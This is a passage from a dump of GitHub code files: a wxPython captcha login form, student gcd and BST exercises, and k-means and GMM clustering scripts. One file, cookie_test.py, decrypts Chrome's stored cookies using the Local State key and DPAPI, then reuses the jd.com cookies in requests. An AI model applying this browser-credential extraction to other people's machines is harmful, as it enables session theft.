"text": "# 载入必要的模块\nimport wx\nimport os\nimport pygame\nfrom pygame.locals import *\nimport itertools\nimport random\n\n\n# 创建类\nclass Example(wx.Frame):\n def __init__(self, parent, title):\n # 继承父类wx.Frame的初始化方法,并设置窗口大小为320*220\n super(Example, self).__init__(parent, title=title, size=(320, 220))\n self.InitUI()\n self.Centre()\n self.Show()\n\n # 产生图片验证码的图像,保存在本地电脑\n def generate_picture(self):\n # pygame初始化\n pygame.init()\n # 设置字体和字号\n font = pygame.font.SysFont('consolas', 64)\n # 产生字母及数字列表,并重组,取其前四个作为图片验证码的文字\n chr_num_lst = list(itertools.chain([chr(ord('A') + _) for _ in range(26)], \\\n [chr(ord('a') + _) for _ in range(26)], \\\n [str(_) for _ in range(10)]))\n\n random.shuffle(chr_num_lst)\n self.val_text = chr_num_lst[0] + chr_num_lst[1] + chr_num_lst[2] + chr_num_lst[3]\n # 渲染图片,设置背景颜色和字体样式,前面的颜色是字体颜色\n ftext = font.render(self.val_text, True, (0, 0, 255), (255, 0, 0))\n # 保存图片\n pygame.image.save(ftext, r\"%s/val.png\" % os.getcwd()) # 图片保存地址\n\n def InitUI(self):\n # 产生验证码图片\n self.generate_picture()\n\n # 利用wxpython的GridBagSizer()进行页面布局\n panel = wx.Panel(self)\n sizer = wx.GridBagSizer(10, 20) # 列间隔为10,行间隔为20\n\n # 添加账号字段,并加入页面布局,为第一行,第一列\n text = wx.StaticText(panel, label=\"账号\")\n sizer.Add(text, pos=(0, 0), flag=wx.ALL, border=5)\n\n # 添加文本框字段,并加入页面布局,为第一行,第2,3列\n self.tc = wx.TextCtrl(panel)\n sizer.Add(self.tc, pos=(0, 1), span=(1, 2), flag=wx.EXPAND | wx.ALL, border=5)\n\n # 添加密码字段,并加入页面布局,为第二行,第一列\n text1 = wx.StaticText(panel, label=\"密码\")\n sizer.Add(text1, pos=(1, 0), flag=wx.ALL, border=5)\n\n # 添加文本框字段,以星号掩盖,并加入页面布局,为第二行,第2,3列\n tc1 = wx.TextCtrl(panel, style=wx.TE_PASSWORD)\n sizer.Add(tc1, pos=(1, 1), span=(1, 2), flag=wx.EXPAND | wx.ALL, border=5)\n\n # 添加验证码字段,并加入页面布局,为第三行,第一列\n text2 = wx.StaticText(panel, label=\"验证码\")\n sizer.Add(text2, pos=(2, 0), flag=wx.ALL, border=5)\n\n # 添加文本框字段,并加入页面布局,为第三行,第2列\n self.tc2 = wx.TextCtrl(panel)\n sizer.Add(self.tc2, pos=(2, 1), flag=wx.ALL, border=5)\n\n # 添加验证码图片,并加入页面布局,为第三行,第3列\n image = wx.Image(r'%s/val.png' % os.getcwd(),\n wx.BITMAP_TYPE_PNG).Rescale(80, 25).ConvertToBitmap() # 获取图片,转化为Bitmap形式\n self.bmp = wx.StaticBitmap(panel, -1, image) # 转化为wx.StaticBitmap()形式\n sizer.Add(self.bmp, pos=(2, 2), flag=wx.ALL, border=5)\n\n # 添加登录按钮,并加入页面布局,为第四行,第2列\n btn = wx.Button(panel, -1, \"登录\")\n sizer.Add(btn, pos=(3, 1), flag=wx.ALL, border=5)\n\n # 为登录按钮绑定login_process事件\n self.Bind(wx.EVT_BUTTON, self.login_process, btn)\n # 将Panmel适应GridBagSizer()放置\n panel.SetSizerAndFit(sizer)\n\n # 事件处理\n def login_process(self, event):\n self.input_val = self.tc2.GetValue() # 获取验证码文本框的输入文字\n\n # 判断验证码文本框的输入文字是否等于验证码图片上的文字(不计大小写),并弹出消息框\n if self.input_val.lower() == self.val_text.lower():\n wx.MessageBox(\"登录成功!\\n欢迎您,%s!\" % self.tc.GetValue(), '登录结果', wx.OK | wx.ICON_INFORMATION)\n else:\n wx.MessageBox(\"登录失败!请重试!\", '登录结果', wx.OK | wx.ICON_INFORMATION)\n self.tc2.SetValue(\"\") # 将验证码文本框清空\n self.generate_picture() # 重新产生一张验证码图片\n # 获取新产生的验证码图片,转化为Bitmap形式\n image = wx.Image(r'%s/val.png' % os.getcwd(), wx.BITMAP_TYPE_PNG).Rescale(80, 25).ConvertToBitmap()\n # 更新GridBagSizer()的self.bmp\n self.bmp.SetBitmap(wx.BitmapFromImage(image))\n\n\n# 主函数\ndef main():\n app = wx.App()\n Example(None, title='图片验证GUI')\n app.MainLoop()\n\n\nmain()\n"
},
{
"alpha_fraction": 0.5928723216056824,
"alphanum_fraction": 0.6097474694252014,
"avg_line_length": 36.83035659790039,
"blob_id": "d65e12d41ded2e6c72beca81f27d601d8d5156f6",
"content_id": "a9da0eec54d4d68e2bd5d47ff84960590b519a97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8474,
"license_type": "no_license",
"max_line_length": 806,
"num_lines": 224,
"path": "/cookie_test.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport sqlite3\nimport http.cookiejar as cookiejar\nimport json, base64\n\nimport requests\n\nimport aesgcm\n\nsql = \"\"\"\nSELECT\n host_key, name, path,encrypted_value as value\nFROM\n cookies\n\"\"\"\n\n\ndef dpapi_decrypt(encrypted):\n import ctypes\n import ctypes.wintypes\n\n class DATA_BLOB(ctypes.Structure):\n _fields_ = [('cbData', ctypes.wintypes.DWORD),\n ('pbData', ctypes.POINTER(ctypes.c_char))]\n\n p = ctypes.create_string_buffer(encrypted, len(encrypted))\n blobin = DATA_BLOB(ctypes.sizeof(p), p)\n blobout = DATA_BLOB()\n retval = ctypes.windll.crypt32.CryptUnprotectData(\n ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))\n if not retval:\n raise ctypes.WinError()\n result = ctypes.string_at(blobout.pbData, blobout.cbData)\n ctypes.windll.kernel32.LocalFree(blobout.pbData)\n return result\n\n\ndef unix_decrypt(encrypted):\n if not encrypted or len(encrypted) <= 3:\n return None\n print(\"unix_decrypt encrypted={}\".format(encrypted))\n if sys.platform.startswith('linux'):\n password = 'peanuts'.encode('utf8')\n iterations = 1\n else:\n raise NotImplementedError\n\n from Crypto.Cipher import AES\n from Crypto.Protocol.KDF import PBKDF2\n\n salt = b'saltysalt'\n iv = b' ' * 16\n length = 16\n key = PBKDF2(password, salt, length, iterations)\n cipher = AES.new(key, AES.MODE_CBC, IV=iv)\n decrypted = cipher.decrypt(encrypted[3:])\n print(\"unix_decrypt decrypted={}\".format(decrypted))\n # return decrypted[:-ord(decrypted[-1])]\n return decrypted[:-decrypted[-1]]\n\n\ndef get_key_from_local_state():\n jsn = None\n with open(os.path.join(os.environ['LOCALAPPDATA'], r\"Google\\Chrome\\User Data\\Local State\"), encoding='utf-8',\n mode=\"r\") as f:\n jsn = json.loads(str(f.readline()))\n return jsn[\"os_crypt\"][\"encrypted_key\"]\n\n\ndef aes_decrypt(encrypted_txt):\n encoded_key = get_key_from_local_state()\n encrypted_key = base64.b64decode(encoded_key.encode())\n encrypted_key = encrypted_key[5:]\n key = dpapi_decrypt(encrypted_key)\n nonce = encrypted_txt[3:15]\n cipher = aesgcm.get_cipher(key)\n return aesgcm.decrypt(cipher, encrypted_txt[15:], nonce)\n\n\ndef chrome_decrypt(encrypted_txt):\n if sys.platform == 'win32':\n try:\n if encrypted_txt[:4] == b'\\x01\\x00\\x00\\x00':\n decrypted_txt = dpapi_decrypt(encrypted_txt)\n return decrypted_txt.decode()\n elif encrypted_txt[:3] == b'v10':\n decrypted_txt = aes_decrypt(encrypted_txt)\n return decrypted_txt[:-16].decode()\n except WindowsError:\n return None\n else:\n return unix_decrypt(encrypted_txt)\n # try:\n #\n # except NotImplementedError:\n # return None\n\n\ndef to_epoch(chrome_ts):\n if chrome_ts:\n return chrome_ts - 11644473600 * 000 * 1000\n else:\n return None\n\n\nclass ChromeCookieJar(cookiejar.FileCookieJar):\n def __init__(self, filename=None, delayload=False, policy=None):\n self.cookies = []\n if filename is None:\n if sys.platform == 'win32':\n filename = os.path.join(\n os.environ['USERPROFILE'],\n r'AppData\\Local\\Google\\Chrome\\User Data\\default\\Cookies')\n '''\n AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Profile [n]\\\\Cookies\n '''\n elif sys.platform.startswith('linux'):\n filename = os.path.expanduser(\n '~/.config/google-chrome/Default/Cookies')\n if not os.path.exists(filename):\n filename = os.path.expanduser(\n '~/.config/chromium/Default/Cookies')\n if not os.path.exists(filename):\n filename = None\n cookiejar.FileCookieJar.__init__(self, filename, delayload, policy)\n\n def _really_load(self, f, filename, ignore_discard, ignore_expires):\n con = sqlite3.connect(filename)\n con.row_factory = sqlite3.Row\n con.create_function('decrypt', 1, chrome_decrypt)\n con.create_function('to_epoch', 1, to_epoch)\n cur = con.cursor()\n cur.execute(sql)\n for row in cur:\n if row['value'] is not None:\n name = row['name']\n value = chrome_decrypt(row['value'])\n host = row['host_key']\n path = row['path']\n cookie = {\"name\": name, \"value\": value, \"host\": host, \"path\": path}\n self.cookies.append(cookie)\n # print(\"host:\" + str(host) + \" path:\" + str(path) + \" name:\" + str(name) + \" value:\" + str(value))\n cur.close()\n\n\ndef isDesiredDomain(origin, dest, isExact=True):\n if not isExact:\n return dest in origin\n else:\n return origin == dest\n\n\ndef existInDomain(domain, cookie, isExact=True):\n if isDesiredDomain(cookie['host'], domain['domain'], isExact):\n if \"fields\" in domain and domain[\"fields\"] and len(domain['fields']) > 0:\n for field in domain['fields']:\n if field == cookie['name']:\n return True\n else:\n return True\n if \"filters\" in domain and domain[\"filters\"] and len(domain['filters']) > 0:\n for filter_item in domain['filters']:\n if filter_item == cookie['name']:\n return False\n return True\n else:\n return True\n return False\n\n\ndef existInArray(domains, cookie, isExact=True):\n if not domains:\n return True\n for domain in domains:\n if existInDomain(domain, cookie, isExact):\n return True\n return False\n\n\ndef fetch_chrome_cookie(domains=[], isExact=True):\n try:\n jar = ChromeCookieJar()\n jar.load()\n cookieValue = ''\n for item in jar.cookies:\n if existInArray(domains, item, isExact):\n cookieValue += item['name'] + '=' + item['value'] + '; '\n return cookieValue[:-2]\n except Exception as e:\n print(\"fetch_chrome_cookie\", e)\n return \"\"\n\n\nif __name__ == '__main__':\n coo = fetch_chrome_cookie([{\"domain\": \".jd.com\"}], False)\n print(coo)\n session = requests.Session()\n cookie = coo\n headers = {'Content-Type': 'application/x-www-form-urlencoded',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36',\n 'Host': 'jdfw.jd.com', 'Origin': 'http://jdfw.jd.com', 'Accept-Encoding': 'gzip, deflate',\n 'Cookie': cookie, 'Accept-Language': 'zh-CN,zh;q=0.9', 'Connection': 'keep-alive',\n 'Accept': 'application/json, text/javascript, */*; q=0.01', \"X-Requested-With\": \"XMLHttpRequest\",\n 'Referer': 'http://jdfw.jd.com/receipt/receiptDashboardIndex?homePageDistinguish=notAppointed&serviceType=0'}\n data = {\n \"esSwitch\": \"1\", \"subCompanyId\": \"10\", \"wareInfoId\": \"lw_10_334%%603_2\", \"outletsId\": \"0755860394\",\n \"sortKind\": \"4\", \"page\": \"1\", \"rows\": \"20\", \"sort\": \"returnTime\", \"order\": \"desc\", \"serviceType\": \"0\",\n \"fastDealNum\": \"5\"\n }\n result = \"\"\n for item in data:\n result += item + \"=\" + data[item] + \"&\"\n result = result + \"freeinstall=&startStatus=&endStatus=&timeout=&todayOtherReservationConditionName=&productBrand=&productType1=&productType2=&productType3=&orderId=&bizOrderId=&ordernoGroup=&customerName=&customerPhone=&serviceStreet=&wareId=&productName=&orderStatus=&orderStatusGroup=&createOrderTimeBegin=&createOrderTimeEnd=&reservationDateBegin=&reservationDateEnd=&firstReservationTimeBegin=&firstReservationTimeEnd=&changedReservationDateBegin=&changedReservationDateEnd=&feedbackStatus=&orderOrderStatus=&expectAtHomeDateBegin=&expectAtHomeDateEnd=&atHomeFinishDateBegin=&atHomeFinishDateEnd=&deliveryDateStart=&deliveryDateEnd=&homePageDistinguish=&fastDealNumByColor=&reservationStatus=&reportLessFlag=&superExperienceStore=&sourceOrderIdGroup=&sellerId=&sellerName=&eclpBusinessNo=&isFast=\"\n print(result)\n params = {}\n datas = result.split(\"&\")\n for data in datas:\n content = data.split(\"=\")\n if len(content) > 1:\n params[content[0]] = content[1]\n\n response = session.post(\"http://jdfw.jd.com/receipt/query.json\", headers=headers, data=params)\n print(response.text)\n"
}
] | 26 |
Vikku14/Coding-practice | https://github.com/Vikku14/Coding-practice | b72bb8dff29e95b57e26866d6e6233174c995123 | 34c784169401d185b907d742dd8524addbfea1d9 | 9415100e3532bbbd17ecb2755818bc22185a4a7a | refs/heads/master | 2018-09-25T05:37:10.679130 | 2018-06-07T04:51:47 | 2018-06-07T04:51:47 | 120,972,974 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8026315569877625,
"alphanum_fraction": 0.8026315569877625,
"avg_line_length": 37,
"blob_id": "723b8539055448cf4b42f720aa867e85e4bd1b5a",
"content_id": "e27337016d4e36ac053caad6748a6480d7d8f260",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 76,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Vikku14/Coding-practice",
"src_encoding": "UTF-8",
"text": "# Coding-practice\nHere I will be uploading all my coding practices program.\n"
},
{
"alpha_fraction": 0.47643980383872986,
"alphanum_fraction": 0.49738219380378723,
"avg_line_length": 20.33333396911621,
"blob_id": "157e9aa154e9b83ffcabb36f987bf51e35150be7",
"content_id": "dcad1f1cfd99c45abb732e21bccc6b70fa6bcb53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 191,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 9,
"path": "/NPTEL/Improved gcd.py",
"repo_name": "Vikku14/Coding-practice",
"src_encoding": "UTF-8",
"text": "# cook your dish herex \ndef gcd(m,n):\n for x in range(1,min(m,n)+1):\n if m%x ==0 and n%x ==0:\n lcf=x\n return (lcf) \nm = int(input())\nn = int(input())\nprint(gcd(m,n))"
},
{
"alpha_fraction": 0.45380544662475586,
"alphanum_fraction": 0.45380544662475586,
"avg_line_length": 23.81818199157715,
"blob_id": "d7115fe2967024a3b6ed9a3beddeee84b1d0e14f",
"content_id": "5dc4b082a4e5eb53dd4a2dfb66e0ae5fd54514d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2457,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 99,
"path": "/pythob code/bst.py",
"repo_name": "Vikku14/Coding-practice",
"src_encoding": "UTF-8",
"text": "class tree:\n # vo kon baita h\n def __init__(self, inval=None):\n self.value = inval\n if self.value:\n self.left = tree()\n self.right = tree()\n else:\n self.left = None\n self.right = None\n return\n\n def isempty(self):\n return (self.value == None)\n\n def inorder(self):\n if self.isempty():\n return ([])\n else:\n return (self.left.inorder() +\n [self.value] +\n self.right.inorder()\n )\n\n def __str__(self):\n return (str(self.inorder()))\n\n def find(self, v):\n if (self.isempty):\n return False\n else:\n if self.value == v:\n return True\n elif v > self.value:\n return (self.right.find(v))\n else:\n return (self.left.find(v))\n\n def minval(self):\n if self.left.isempty():\n return self.value\n else:\n return self.left.minval()\n\n def maxval(self):\n if self.right.isempty():\n return self.value\n else:\n return self.right.maxval()\n\n def insert(self, v):\n\n if self.isempty():\n self.value = v\n self.left = tree()\n self.right = tree()\n if self.value == v:\n return\n else:\n if v < self.value:\n self.left.insert(v)\n return\n elif v > self.value:\n self.right.insert(v)\n return\n\n def delete(self, v):\n if self.isempty():\n return\n if v < self.value:\n self.left.delete(v)\n return\n if v > self.value:\n self.right.delete(v)\n return\n if v == self.value:\n if self.isleaf():\n self.makeempty()\n elif self.left.isempty():\n self.copyright()\n else:\n self.value = self.left.maxval()\n self.left.delete(self.left.maxval())\n return\n\n def makeempty(self):\n self.value = None\n self.left = None\n self.right = None\n return\n\n def copyright(self):\n self.value = self.right.value\n self.left = self.right.left\n self.right = self.right.right\n return\n\n def isleaf(self):\n return (self.left.isempty() and self.right.isempty())\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5204678177833557,
"avg_line_length": 27.58333396911621,
"blob_id": "19d5e112ff82076b3364c019551bda018bccb92e",
"content_id": "0b89b1794ad73b45e0d5ced63385267a33e4eabb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 342,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 12,
"path": "/NPTEL/simple gcd.py",
"repo_name": "Vikku14/Coding-practice",
"src_encoding": "UTF-8",
"text": "# cook your dish herex \ndef gcd(m,n):\n ml = [x for x in range(1,m+1) if m%x is 0]\n nl = [x for x in range(1,n+1) if n%x is 0]\n if len(ml)>=len(nl):\n l = [x for x in ml if x in nl]\n else:\n l = [x for x in nl if x in ml]\n print(\"\\n\",l[-1]) \nm = int(input(\"enter numbers\"))\nn = int(input(\"enter numbers\"))\ngcd(m,n)"
}
] | 4 |
1180300407/machine-learning | https://github.com/1180300407/machine-learning | ffa16b0575bd6b7d56904224fe075829e353cf75 | ea643973836cf2b21922ba26c5bd25d94f0172c2 | d5941eb7742deda18de689e38eb839954a151c2d | refs/heads/master | 2022-12-30T11:30:24.761451 | 2021-04-14T11:09:48 | 2021-04-14T11:09:48 | 301,438,661 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4816589653491974,
"alphanum_fraction": 0.5001652240753174,
"avg_line_length": 27.023147583007812,
"blob_id": "4817ebe5a4fc5b0a64136d7598aaa72af6170cef",
"content_id": "955e6cee3204e61174a8f0ecd37961a3d5c71d0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6896,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 216,
"path": "/lab3/GMM.py",
"repo_name": "1180300407/machine-learning",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom k_means import k_means,draw\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass GMM:\n '''\n GMM聚类\n '''\n def __init__(self, center, labels, k_means_flag, terminal, data, k):\n '''\n 构造函数\n center :预先设置的中心向量\n labels :预先设置的标签\n k_means_flag:是否使用k_means作为初始化的标识\n terminal :迭代次数\n data: :数据\n k :聚类目标类别数\n '''\n self.data = data\n self.k = k\n self.terminal = terminal\n if k_means_flag:\n func = k_means(data, k)\n self.labels, self.center = func.k_means()\n else:\n self.labels = labels\n self.center = center\n\n #GMM初始化均值向量与协方差,以及隐变量的离散概率分布alpha\n def GMM_init(self):\n #初始化均值向量为k-means的分类中心向量\n mean = self.center\n #协方差\n cov = []\n \n size = self.data.shape[0]\n #计算k个类别(k个高斯分布)的初始协方差\n for i in range(self.k):\n #存储类别为第i类的数据样本\n data_i = []\n for j in range(size):\n if(self.labels[j] == i):\n data_i.append(self.data[j,:])\n length = len(data_i)\n data_i = np.array(data_i)\n \n #用矩阵点乘计算协方差,需要计算(X1-E(X1))以及(X2-E(X2)),为length*2维向量\n #因此需要把第i类的均值扩展成length*2\n temp_mean = []\n for l in range(length):\n temp_mean.append(mean[i,:])\n temp_mean = np.array(temp_mean)\n #第i类的协方差\n cov_i = np.dot((data_i-temp_mean).T,(data_i-temp_mean))/length\n cov.append(cov_i)\n cov = np.array(cov)\n alpha = []\n for i in range(self.k):\n alpha.append(float(1)/self.k)\n return mean, cov, alpha\n\n\n #在index_label类的均值mean,方差cov的二维高斯分布条件下,计算第index_data个数据样本的概率\n #data :数据\n #mean :均值向量\n #cov :协方差\n def Gauss_PDF(self, data, mean, cov):\n data = np.array(data)\n dim = len(data)\n data = data.reshape(dim, 1)\n mean = np.array(mean)\n mean = mean.reshape(dim, 1)\n power = np.exp(-1 / 2 * np.dot((data - mean).reshape(1, dim), np.linalg.inv(cov).dot((data - mean).reshape(dim, 1))))\n temp = pow(2 * np.pi, dim / 2) * pow(np.linalg.det(cov), 0.5)\n return power[0][0] / temp\n\n\n\n #用EM迭代算法实现GMM模型(采用k-means结果进行初始化)\n def GMM_EM(self):\n #利用k—means结果得到初始参数\n init_value = self.GMM_init()\n mean = init_value[0]\n cov = init_value[1]\n alpha = init_value[2]\n \n n, m = self.data.shape\n \n gamma = np.zeros((n, self.k))\n \n # EM 算法\n for step in range(self.terminal):\n # E-step\n for i in range(n):\n #temp列表中的每一项对应于原函数的一个sum_latent\n \n temp = []\n for j in range(self.k):\n #print('data_i: ' + str(self.data[i]))\n #print('mean: ' + str(mean[j]))\n #print('cov: ' + str(cov[j]))\n temp.append(alpha[j] * self.Gauss_PDF(self.data[i], mean[j], cov[j]))\n \n #求和\n sum_temp = sum(temp)\n #更新gamma矩阵\n for j in range(self.k):\n gamma[i][j] = temp[j] / sum_temp\n\n # M-step\n temp = [sum([gamma[i][j] for i in range(n)]) for j in range(self.k)]\n for j in range(self.k):\n #更新均值\n mean[j] = sum([gamma[i][j] * self.data[i] for i in range(n)]) / temp[j]\n #更新协方差\n cov[j] = sum([gamma[i][j] * np.dot((self.data[i] - mean[j]).reshape(m, 1), (self.data[i] - mean[j]).reshape(1, m))\n for i in range(n)]) / temp[j]\n #更新先验概率\n alpha[j] = temp[j] / n\n return gamma, mean\n \n \n\n #根据GMM生成的隐变量概率矩阵进行分类 \n #gamma:GMM生成的隐变量概率矩阵\n def GMM_EM_labels(self, gamma):\n size = self.data.shape[0]\n \n #分类标签\n labels=[0]*size\n \n #寻找每个样本在不同类别下的最大概率\n for i in range(size):\n probability=0\n kind=0\n for j in range(self.k):\n if(gamma[i][j]>probability):\n probability=gamma[i][j]\n kind=j\n labels[i]=kind\n return labels\n\n#生成数据,这里采取N=200,k=4\ndef get_data():\n #样本个数\n #N=200\n N1=50\n N2=50\n N3=50\n N4=50\n #聚类的类别个数\n k=4\n\n #k个高斯分布的均值方差\n mean1=[1,1]\n sigma=np.mat([[1,0],[0,1]])\n mean2=[4,1]\n mean3=[1,4]\n mean4=[4,4]\n\n #生成N个样本数据\n data1=np.random.multivariate_normal(mean1,sigma,N1)\n data2=np.random.multivariate_normal(mean2,sigma,N2)\n data3=np.random.multivariate_normal(mean3,sigma,N3)\n data4=np.random.multivariate_normal(mean4,sigma,N4)\n data=np.vstack((data1,data2,data3,data4))\n\n #将点集以及真实类别情况画出来\n draw(data1,N1,1-1)\n draw(data2,N2,2-1)\n draw(data3,N3,3-1)\n draw(data4,N4,4-1)\n plt.title('true labels' )\n plt.show()\n return data, k\n \ndef main():\n #设置GMM_EM迭代次数\n terminal = 1000\n data, k = get_data()\n gmm = GMM('', '', True, terminal, data, k)\n \n #执行GMM_EM\n GMM_value = gmm.GMM_EM()\n #用EM算法得到的GMM模型的概率矩阵以及均值向量\n gamma = GMM_value[0]\n #mean = GMM_value[1]\n #用得到的概率矩阵以及均值向量进行软分类\n labels = gmm.GMM_EM_labels(gamma)\n\n #根据标签结果聚为k类,画出结果\n data_firsttype=[]\n data_secondtype=[]\n data_thirdtype=[]\n data_fourthtype=[]\n\n N = data.shape[0]\n for i in range(N):\n if(labels[i]==0):\n data_firsttype.append(data[i])\n elif(labels[i]==1):\n data_secondtype.append(data[i])\n elif(labels[i]==2):\n data_thirdtype.append(data[i])\n else:\n data_fourthtype.append(data[i])\n draw(data_firsttype,len(data_firsttype),0)\n draw(data_secondtype,len(data_secondtype),1)\n draw(data_thirdtype,len(data_thirdtype),2)\n draw(data_fourthtype,len(data_fourthtype),3)\n plt.title('labels-GMM_EM' )\n plt.show()\n\nif __name__=='__main__':\n main()"
},
{
"alpha_fraction": 0.5132209062576294,
"alphanum_fraction": 0.5352904200553894,
"avg_line_length": 25.36263656616211,
"blob_id": "7d023600e9372838d60c7369648ac6c3231f25a3",
"content_id": "0ae161216a19b6483332e2d1207768eb0f84a4c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5679,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 182,
"path": "/lab3/k_means.py",
"repo_name": "1180300407/machine-learning",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass k_means:\n '''\n k_means聚类算法\n '''\n def __init__(self, data, k):\n '''\n 构造函数\n data:数据\n k :聚类目标类别数\n '''\n self.data = data\n self.k = k\n \n #k—means算法初始化k个中心向量\n def initialize_center(self):\n #k个中心向量\n center = []\n #用集合来保存目前为止生成的随机中心id\n init_centerid = set();\n while(True):\n #当生成k个时,终止循环\n if(len(init_centerid)==self.k):\n break\n #生成一个[0,size-1]的索引,Data[rand_id]则为一个随机选定的中心\n rand_id = np.random.randint(0, self.data.shape[0]-1)\n #加入set中避免重复生成\n init_centerid.add(rand_id)\n \n for i in init_centerid:\n #读取集合中选取的索引id对应的向量,作为中心向量\n center_i = np.array(self.data[i])\n center.append(center_i)\n center = np.array(center) \n return center\n \n #计算两个行向量间的距离\n #vector1:行向量1\n #vector2:行向量2\n def distance_calculate(self, vector1, vector2):\n minus = np.mat(vector1) - np.mat(vector2)\n distance = np.dot(minus, minus.T)\n return distance\n \n #重新选择k-means算法中每一类的中心向量\n #labels:目前算法为样本赋值的标签\n def re_center(self, labels):\n size = self.data.shape[0]\n dim = self.data.shape[1]\n #新的中心向量\n center_new = np.array([[float(0)]*dim]*self.k)\n center_new = center_new.reshape(self.k, dim)\n #记录每一个类别各有多少数据\n num = [0]* self.k\n for i in range(size):\n #第i个样本点所属类别为labels[i]\n #将其数据加到该类别中心向量上,最后中心向量求均值\n center_new[labels[i]] += self.data[i]\n num[labels[i]] += 1\n \n #之前中心向量保存的是其内样本数据之和,要求平均,作为新的中心向量\n for i in range(self.k):\n if(num[i]!=0):\n center_new[i] = center_new[i] / num[i]\n \n center_new=np.array(center_new)\n return center_new\n \n #k-means算法\n def k_means(self):\n size = self.data.shape[0]\n dim = self.data.shape[1]\n labels = [-1]*size\n center = np.array([[float(0)]*dim]*self.k)\n center = center.reshape(self.k, 2)\n center_new = self.initialize_center()\n #当中心向量不再变化时停止更新\n while(not((center==center_new).all())):\n center=center_new\n \n #每一个样本点\n for i in range(size):\n #维护每个样本点到所有中心向量的最小距离\n min_distance = 1e10\n #对所有中心向量都进行距离计算\n for j in range(self.k):\n distance = self.distance_calculate(self.data[i], center[j])\n #维护最小距离\n if(distance<min_distance):\n min_distance = distance\n #对样本根据最小距离进行标签划分\n labels[i] = j\n \n center_new = self.re_center(labels)\n \n return labels,center\n\n#生成数据,这里采取N=200,k=4\ndef get_data():\n #样本个数\n #N=200\n N1=50\n N2=50\n N3=50\n N4=50\n #聚类的类别个数\n k=4\n\n #k个高斯分布的均值方差\n mean1=[1,1]\n sigma=np.mat([[1,0],[0,1]])\n mean2=[4,1]\n mean3=[1,4]\n mean4=[4,4]\n\n #生成N个样本数据\n data1=np.random.multivariate_normal(mean1,sigma,N1)\n data2=np.random.multivariate_normal(mean2,sigma,N2)\n data3=np.random.multivariate_normal(mean3,sigma,N3)\n data4=np.random.multivariate_normal(mean4,sigma,N4)\n data=np.vstack((data1,data2,data3,data4))\n\n #将点集以及真实类别情况画出来\n draw(data1,N1,1-1)\n draw(data2,N2,2-1)\n draw(data3,N3,3-1)\n draw(data4,N4,4-1)\n plt.title('true labels' )\n plt.show()\n return data, k\n\n\n#可视化第index类的点,不同类别对应不同颜色\n#Data :待可视化数据集\n#size :数据集的大小\n#index:数据集的分类类别\ndef draw(Data,size,index):\n x=[]\n y=[]\n #四种类别分用不同颜色画出\n color=['blue','green','yellow','orange']\n for i in range(size):\n x.append(Data[i][0]) \n y.append(Data[i][1])\n plt.scatter(x,y,marker='o',c=color[index]) \n\n#执行k_means算法进行聚类\ndef excute_kmeans():\n data, k = get_data()\n func = k_means(data, k)\n labels, center = func.k_means()\n #根据标签结果聚为k类,画出结果\n data_firsttype = []\n data_secondtype = []\n data_thirdtype = []\n data_fourthtype = []\n N = data.shape[0]\n for i in range(N):\n if(labels[i]==0):\n data_firsttype.append(data[i])\n elif(labels[i]==1):\n data_secondtype.append(data[i])\n elif(labels[i]==2):\n data_thirdtype.append(data[i])\n else:\n data_fourthtype.append(data[i])\n draw(data_firsttype,len(data_firsttype),0)\n draw(data_secondtype,len(data_secondtype),1)\n draw(data_thirdtype,len(data_thirdtype),2)\n draw(data_fourthtype,len(data_fourthtype),3)\n plt.title('labels-kmeans' )\n plt.show()\n \ndef main():\n excute_kmeans()\n \nif __name__=='__main__':\n main()\n \n"
},
{
"alpha_fraction": 0.7425742745399475,
"alphanum_fraction": 0.8168317079544067,
"avg_line_length": 10.882352828979492,
"blob_id": "8131e43f5dd04a464936e487323a1ed44fda517e",
"content_id": "cfabaa797630ab2bec5a8ea5c4d6498db8e1d06c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 466,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 17,
"path": "/Readme.md",
"repo_name": "1180300407/machine-learning",
"src_encoding": "UTF-8",
"text": "哈工大机器学习课程资料\n\n实验一:最小二乘法\n\n实验二:逻辑回归\n\n实验三:k_means和GMM聚类\n\n实验四:PCA降维\n\n2020试题:2020秋的试题,凭印象记录,仅供参考\n\n课件:老师的上课课件\n\nexam_cmu:复习时参考的cmu试题(从结果来说,对我2020年的期末考试没有什么帮助)\n\n另附B站一个超赞up主,主讲机器学习(白板推导系列),个人觉得讲得非常通透: shuhuai008\n"
},
{
"alpha_fraction": 0.4641474187374115,
"alphanum_fraction": 0.47843503952026367,
"avg_line_length": 29.3157901763916,
"blob_id": "bd5ada0d4f633ca764385d3d0fe5d457c85a6bb9",
"content_id": "3d4c536ed6aacd2aed18869486a5de5a56b8fb71",
"detected_licenses": [],
